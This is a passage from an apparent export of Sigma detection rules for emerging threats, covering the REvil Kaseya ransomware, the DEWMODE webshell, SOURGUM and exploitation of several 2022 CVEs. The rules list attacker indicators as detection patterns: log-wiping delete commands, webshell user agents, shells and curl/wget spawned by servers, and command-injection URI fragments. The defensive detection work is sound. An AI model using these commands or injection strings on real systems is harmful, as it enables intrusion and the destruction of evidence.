'facebookexternalhit/1.1+(+http://www.facebook.com/externalhit_uatext.php)'\n            - 'Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)'\n            - 'Mozilla/5.0+(compatible;+Bingbot/2.0;++http://www.bing.com/bingbot.htm)'\n            - 'Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html'\n            - 'Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)'\n            - 'Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp)'\n            - 'Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots)'\n            - 'Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36'\n    selection_3:\n        cs-uri-query|contains: '/ecp/'\n        cs-method: 'POST'\n        cs-user-agent:\n            - 'ExchangeServicesClient/0.0.0.0'\n            - 'python-requests/2.19.1'\n            - 'python-requests/2.25.1'\n    selection_4:\n        cs-uri-query|contains:\n            - '/aspnet_client/'\n            - '/owa/'\n        cs-method: 'POST'\n        cs-user-agent:\n            - 'antSword/v2.1'\n            - 'Googlebot/2.1+(+http://www.googlebot.com/bot.html)'\n            - 'Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)'\n    selection_5:\n        cs-uri-query|contains:\n            - '/owa/auth/Current/'\n            - '/ecp/default.flt'\n            - '/ecp/main.css'\n        cs-method: 'POST'\n    selection_6:\n        cs-method: 'POST'\n        cs-uri-query|contains|all:\n            - '/ecp/'\n            - '.js'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate access to other web applications that use the same folder names as Exchange (e.g. owa, ecp) but are not Microsoft Exchange related\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/TA/Kaseya-Supply-Chain/proc_creation_win_apt_revil_kaseya.yml",
    "content": "title: REvil Kaseya Incident Malware Patterns\nid: 5de632bc-7fbd-4c8a-944a-fce55c59eae5\nstatus: test\ndescription: Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)\nreferences:\n    - https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers\n    - https://www.joesandbox.com/analysis/443736/0/html\n    - https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b\n    - https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/\n    - https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-03\nmodified: 2022-05-20\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.g0115\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|contains:\n            - 'C:\\Windows\\cert.exe'\n            - 'del /q /f c:\\kworking\\agent.crt'\n            - 'Kaseya VSA Agent Hot-fix'\n            - '\\AppData\\Local\\Temp\\MsMpEng.exe'\n            - 'rmdir /s /q %SystemDrive%\\inetpub\\logs'\n            - 'del /s /q /f %SystemDrive%\\\\*.log'\n            - 'c:\\kworking1\\agent.exe'\n            - 'c:\\kworking1\\agent.crt'\n    selection2:\n        Image:\n            - 'C:\\Windows\\MsMpEng.exe'\n            - 'C:\\Windows\\cert.exe'\n            - 'C:\\kworking\\agent.exe'\n            - 'C:\\kworking1\\agent.exe'\n    selection3:\n        CommandLine|contains|all:\n            - 'del /s /q /f'\n            - 'WebPages\\Errors\\webErrorLog.txt'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/TA/PRIVATELOG/image_load_usp_svchost_clfsw32.yml",
    "content": "title: APT PRIVATELOG Image Load Pattern\nid: 33a2d1dd-f3b0-40bd-8baf-7974468927cc\nstatus: test\ndescription: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances\nreferences:\n    - https://web.archive.org/web/20210901184449/https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-09-07\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n        ImageLoaded|endswith: '\\clfsw32.dll'\n    condition: selection\nfalsepositives:\n    - Rarely observed\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/TA/SOURGUM/proc_creation_win_apt_sourgrum.yml",
    "content": "title: SOURGUM Actor Behaviours\nid: 7ba08e95-1e0b-40cd-9db5-b980555e42fd\nstatus: test\ndescription: Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM\nreferences:\n    - https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection\n    - https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml\n    - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/\nauthor: MSTIC, FPT.EagleEye\ndate: 2021-06-15\nmodified: 2022-10-09\ntags:\n    - attack.t1546\n    - attack.t1546.015\n    - attack.persistence\n    - attack.privilege-escalation\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|contains:\n            - 'windows\\system32\\Physmem.sys'\n            - 'Windows\\system32\\ime\\SHARED\\WimBootConfigurations.ini'\n            - 'Windows\\system32\\ime\\IMEJP\\WimBootConfigurations.ini'\n            - 'Windows\\system32\\ime\\IMETC\\WimBootConfigurations.ini'\n    registry_image:\n        Image|contains:\n            - 'windows\\system32\\filepath2'\n            - 'windows\\system32\\ime'\n        CommandLine|contains: 'reg add'\n    registry_key:\n        CommandLine|contains:\n            - 'HKEY_LOCAL_MACHINE\\software\\classes\\clsid\\{7c857801-7381-11cf-884d-00aa004b2e24}\\inprocserver32'\n            - 'HKEY_LOCAL_MACHINE\\software\\classes\\clsid\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\inprocserver32'\n    condition: selection or all of registry_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/TA/UNC2546/web_unc2546_dewmode_php_webshell.yml",
    "content": "title: DEWMODE Webshell Access\nid: fdf96c90-42d5-4406-8a9c-14a2c9a016b5\nstatus: test\ndescription: Detects access to DEWMODE webshell as described in FIREEYE report\nreferences:\n    - https://www.mandiant.com/resources/blog/accellion-fta-exploited-for-data-theft-and-extortion\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-02-22\nmodified: 2023-01-02\ntags:\n    - attack.persistence\n    - attack.t1505.003\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection1:\n        cs-uri-query|contains|all:\n            - '?dwn='\n            - '&fn='\n            - '.html?'\n    selection2:\n        cs-uri-query|contains|all:\n            - '&dwn='\n            - '?fn='\n            - '.html?'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-21554/proc_creation_win_exploit_cve_2023_21554_queuejumper.yml",
    "content": "title: Potential CVE-2023-21554 QueueJumper Exploitation\nid: 53207cc2-0745-4c19-bc72-80be1cc16b3f\nstatus: test\ndescription: Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)\nreferences:\n    - https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-12\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - cve.2023-21554\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\Windows\\System32\\mqsvc.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\schtasks.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n            - '\\wsl.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-21587/web_cve_2022_21587_oracle_ebs.yml",
    "content": "title: Potential CVE-2022-21587 Exploitation Attempt\nid: d033cb8a-8669-4a8e-a974-48d4185a8503\nstatus: test\ndescription: Detects potential exploitation attempts of CVE-2022-21587 an arbitrary file upload vulnerability impacting Oracle E-Business Suite (EBS). CVE-2022-21587 can lead to unauthenticated remote code execution.\nreferences:\n    - https://www.rapid7.com/blog/post/2023/02/07/etr-cve-2022-21587-rapid7-observed-exploitation-of-oracle-e-business-suite-vulnerability/\n    - https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis\n    - https://github.com/hieuminhnv/CVE-2022-21587-POC\n    - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/\nauthor: Isa Almannaei\ndate: 2023-02-13\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-21587\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query|contains:\n            - '/OA_HTML/BneViewerXMLService?bne:uueupload=TRUE'\n            - '/OA_HTML/BneUploaderService?bne:uueupload=TRUE'\n            - '/OA_HTML/BneDownloadService?bne:uueupload=TRUE'\n            - '/OA_HTML/BneOfflineLOVService?bne:uueupload=TRUE'\n    condition: selection\nfalsepositives:\n    - Vulnerability Scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-21919/win_system_exploit_cve_2022_21919_or_cve_2021_34484.yml",
    "content": "title: Potential Exploitation of CVE-2022-21919 or CVE-2021-34484 for LPE\nid: 52a85084-6989-40c3-8f32-091e12e17692\nstatus: test\ndescription: |\n    Detects potential exploitation attempts of CVE-2022-21919 or CVE-2021-34484 leading to local privilege escalation via the User Profile Service.\n    During exploitation of this vulnerability, two logs (Provider_Name: Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 are created (EventID 1515 may generate many false positives).\n    Additionally, the directory \\Users\\TEMP may be created during exploitation. This behavior was observed on Windows Server 2008.\nreferences:\n    - https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html\nauthor: Cybex\ndate: 2022-08-16\nmodified: 2025-11-03\ntags:\n    - attack.execution\n    - detection.emerging-threats\n    - cve.2022-21919\n    - cve.2021-34484\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        EventID: 1511\n        Provider_Name: 'Microsoft-Windows-User Profiles Service'\n    condition: selection\nfalsepositives:\n    - Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx\nlevel: low\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-22954/proc_creation_win_exploit_cve_2022_22954_vmware_workspace_one_rce.yml",
    "content": "title: Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution\nid: 5660d8db-6e25-411f-b92f-094420168a5d\nstatus: test\ndescription: |\n    Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager.\n    As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat \"prunsrv.exe\" process application.\nreferences:\n    - https://blog.morphisec.com/vmware-identity-manager-attack-backdoor\n    - https://github.com/DrorDvash/CVE-2022-22954_VMware_PoC\nauthor: '@kostastsale'\ndate: 2022-04-25\ntags:\n    - attack.execution\n    - attack.initial-access\n    - attack.t1059.006\n    - attack.t1190\n    - cve.2022-22954\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\prunsrv.exe'\n    selection_payload_pwsh:\n        Image|endswith: '\\powershell.exe'\n    selection_payload_cmd:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains: '/c powershell'\n    condition: selection_parent and 1 of selection_payload_*\nfalsepositives:\n    - Some false positives are possible as part of a custom script implementation from admins executed with cmd.exe as the child process.\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-24527/file_event_win_cve_2022_24527_lpe.yml",
    "content": "title: CVE-2022-24527 Microsoft Connected Cache LPE\nid: e0a41412-c69a-446f-8e6e-0e6d7483dad7\nstatus: test\ndescription: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache\nreferences:\n    - https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-13\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1059.001\n    - cve.2022-24527\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: 'WindowsPowerShell\\Modules\\webAdministration\\webAdministration.psm1'\n    filter:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-26134/proc_creation_lnx_exploit_cve_2022_26134_atlassian_confluence.yml",
    "content": "title: Atlassian Confluence CVE-2022-26134\nid: 7fb14105-530e-4e2e-8cfb-99f7d8700b66\nrelated:\n    - id: 245f92e3-c4da-45f1-9070-bc552e06db11\n      type: derived\nstatus: test\ndescription: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134\nreferences:\n    - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-03\ntags:\n    - attack.initial-access\n    - attack.execution\n    - attack.t1190\n    - attack.t1059\n    - cve.2022-26134\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        # Monitor suspicious child processes spawned by Confluence\n        ParentImage|startswith: '/opt/atlassian/confluence/'\n        ParentImage|endswith: '/java'\n        CommandLine|contains:\n            - '/bin/sh'\n            - 'bash'\n            - 'dash'\n            - 'ksh'\n            - 'zsh'\n            - 'csh'\n            - 'fish'\n            - 'curl'\n            - 'wget'\n            - 'python'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-26809/proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml",
    "content": "title: Potential CVE-2022-26809 Exploitation Attempt\nid: a7cd7306-df8b-4398-b711-6f3e4935cf16\nstatus: test\ndescription: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809\n    - https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html\n    - https://twitter.com/cyb3rops/status/1514217991034097664\n    - https://www.securonix.com/blog/cve-2022-26809-remote-procedure-call-runtime-remote-code-execution-vulnerability-and-coverage/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-13\nmodified: 2023-02-03\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.execution\n    - attack.t1569.002\n    - cve.2022-26809\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage: 'C:\\Windows\\System32\\svchost.exe'\n        ParentCommandLine|contains: '-k RPCSS'\n    condition: selection\nfalsepositives:\n    - Unknown\n    - Some cases in which the service spawned a werfault.exe process\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-27925/web_cve_2022_27925_exploit.yml",
    "content": "title: Zimbra Collaboration Suite Email Server Unauthenticated RCE\nid: dd218fb6-4d02-42dc-85f0-a0a376072efd\nstatus: test\ndescription: Detects an attempt to leverage the vulnerable servlet \"mboximport\" for an unauthenticated remote command injection\nreferences:\n    - https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/\n    - https://www.yang99.top/index.php/archives/82/\n    - https://github.com/vnhacker1337/CVE-2022-27925-PoC\nauthor: '@gott_cyber'\ndate: 2022-08-17\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-27925\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_servlet:\n        cs-method: 'POST'\n        cs-uri-query|contains: '/service/extension/backup/mboximport\\?'\n        cs-uri-query|contains|all:\n            - 'account-name'\n            - 'ow'\n            - 'no-switch'\n            - 'append'\n        sc-status:\n            - 401\n            - 200\n    selection_shell:\n        cs-uri-query|contains: '/zimbraAdmin/'\n        cs-uri-query|endswith: '.jsp'\n        sc-status|contains: '200'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-29072/proc_creation_win_exploit_cve_2022_29072_7zip.yml",
    "content": "title: Potential CVE-2022-29072 Exploitation Attempt\nid: 9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3\nstatus: test\ndescription: |\n    Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n    7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\n    The command runs in a child process under the 7zFM.exe process.\nreferences:\n    - https://github.com/kagancapar/CVE-2022-29072\n    - https://twitter.com/kagancapar/status/1515219358234161153\nauthor: frack113, @kostastsale\ndate: 2022-04-17\nmodified: 2024-08-15\ntags:\n    - attack.execution\n    - cve.2022-29072\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\7zFM.exe'\n    selection_img:\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    filter_main_extensions_and_flags:\n        - CommandLine|contains:\n              - ' /c '\n              - ' /k '\n              - ' /r '\n        - CommandLine|endswith:\n              - '.bat'\n              - '.cmd'\n              - '.ps1'\n    filter_main_null:\n        CommandLine: null\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-29799/lnx_exploit_cve_2022_27999_cve_2022_27800.yml",
    "content": "title: Potential Nimbuspwn Exploit CVE-2022-29799 and CVE-2022-27800\nid: 7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8\nstatus: test\ndescription: |\n    Detects potential exploitation attempts of Nimbuspwn vulnerabilities CVE-2022-29799 and CVE-2022-27800 in Linux systems.\nreferences:\n    - https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/\n    - https://github.com/Immersive-Labs-Sec/nimbuspwn\nauthor: Bhabesh Raj\ndate: 2022-05-04\nmodified: 2025-11-03\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - detection.emerging-threats\n    - cve.2022-29799\n    - cve.2022-27800\nlogsource:\n    product: linux\ndetection:\n    keywords:\n        '|all':\n            - 'networkd-dispatcher'\n            - 'Error handling notification for interface'\n            - '../../'\n    condition: keywords\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-30190/registry_set_exploit_cve_2022_30190_msdt_follina.yml",
    "content": "title: Suspicious Set Value of MSDT in Registry (CVE-2022-30190)\nid: 2d9403d5-7927-46b7-8216-37ab7c9ec5e3\nstatus: test\ndescription: Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190\n    - https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/\nauthor: Sittikorn S\ndate: 2020-05-31\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1221\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|startswith: 'HKCR\\ms-msdt\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-31656/web_cve_2022_31656_auth_bypass.yml",
    "content": "title: CVE-2022-31656 VMware Workspace ONE Access Auth Bypass\nid: fcf1101d-07c9-49b2-ad81-7e421ff96d80\nstatus: test\ndescription: |\n    Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656\n    VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users.\n    A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\nreferences:\n    - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-12\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-31656\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains: '/SAAS/t/_/;/'\n    condition: selection\nfalsepositives:\n    - Vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-31659/web_cve_2022_31659_vmware_rce.yml",
    "content": "title: CVE-2022-31659 VMware Workspace ONE Access RCE\nid: efdb2003-a922-48aa-8f37-8b80021a9706\nstatus: test\ndescription: Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659\nreferences:\n    - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-12\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-31659\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query|contains: '/SAAS/jersey/manager/api/migrate/tenant' # Investigate the contents of the post body and look for any suspicious hosts that might be controlled by the attacker\n    condition: selection\nfalsepositives:\n    - Vulnerability scanners\n    - Legitimate access to the URI\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-33891/proc_creation_lnx_exploit_cve_2022_33891_spark_shell_command_injection.yml",
    "content": "title: Apache Spark Shell Command Injection - ProcessCreation\nid: c8a5f584-cdc8-42cc-8cce-0398e4265de3\nstatus: test\ndescription: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective\nreferences:\n    - https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py\n    - https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html\n    - https://github.com/apache/spark/pull/36315/files\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-20\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-33891\n    - detection.emerging-threats\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\bash'\n        CommandLine|contains:\n            - 'id -Gn `'\n            - \"id -Gn '\"\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-33891/web_cve_2022_33891_spark_shell_command_injection.yml",
    "content": "title: Apache Spark Shell Command Injection - Weblogs\nid: 1a9a04fd-02d1-465c-abad-d733fd409f9c\nstatus: test\ndescription: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective\nreferences:\n    - https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py\n    - https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html\n    - https://github.com/apache/spark/pull/36315/files\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-19\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-33891\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains: '?doAs=`'\n    condition: selection\nfalsepositives:\n    - Web vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-36804/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml",
    "content": "title: Atlassian Bitbucket Command Injection Via Archive API\nid: 65c0a0ab-d675-4441-bd6b-d3db226a2685\nstatus: test\ndescription: Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804\nreferences:\n    - https://twitter.com/_0xf4n9x_/status/1572052954538192901\n    - https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/\n    - https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html\n    - https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-29\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2022-36804\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains|all:\n            - '/rest/api/latest/projects/'\n            - 'prefix='\n            - '%00--exec'\n    condition: selection\nfalsepositives:\n    - Web vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-37966/win_system_exploit_cve_2022_37966_kdcsvc_rc4_downgrade.yml",
    "content": "title: Potential KDC RC4-HMAC Downgrade Exploit - CVE-2022-37966\nid: e6f81941-b1cd-4766-87db-9fc156f658ee\nstatus: test\ndescription: Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation\nreferences:\n    - https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-11-09\nmodified: 2025-11-03\ntags:\n    - attack.privilege-escalation\n    - detection.emerging-threats\n    - cve.2022-37966\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID: 42\n        Provider_Name:\n            - 'Kerberos-Key-Distribution-Center'\n            - 'Microsoft-Windows-Kerberos-Key-Distribution-Center'\n        Level: 2  # Error\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-41082/proxy_cve_2022_36804_exchange_owassrf_exploitation.yml",
    "content": "title: Potential OWASSRF Exploitation Attempt - Proxy\nid: 1ddf4596-1908-43c9-add2-1d2c2fcc4797\nstatus: test\ndescription: Detects exploitation attempt of the OWASSRF variant targeting exchange servers It uses the OWA endpoint to access the powershell backend endpoint\nreferences:\n    - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/\n    - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-22\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'POST'\n        sc-status: 200\n        c-uri|contains|all:\n            - '/owa/'\n            - '/powershell'\n        c-uri|contains:\n            - '@'\n            - '%40'\n    filter_main_ua:\n        c-useragent:\n            - 'ClientInfo'\n            - 'Microsoft WinRM Client'\n            - 'Exchange BackEnd Probes'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Web vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2022/Exploits/CVE-2022-41082/proxy_cve_2022_36804_exchange_owassrf_poc_exploitation.yml",
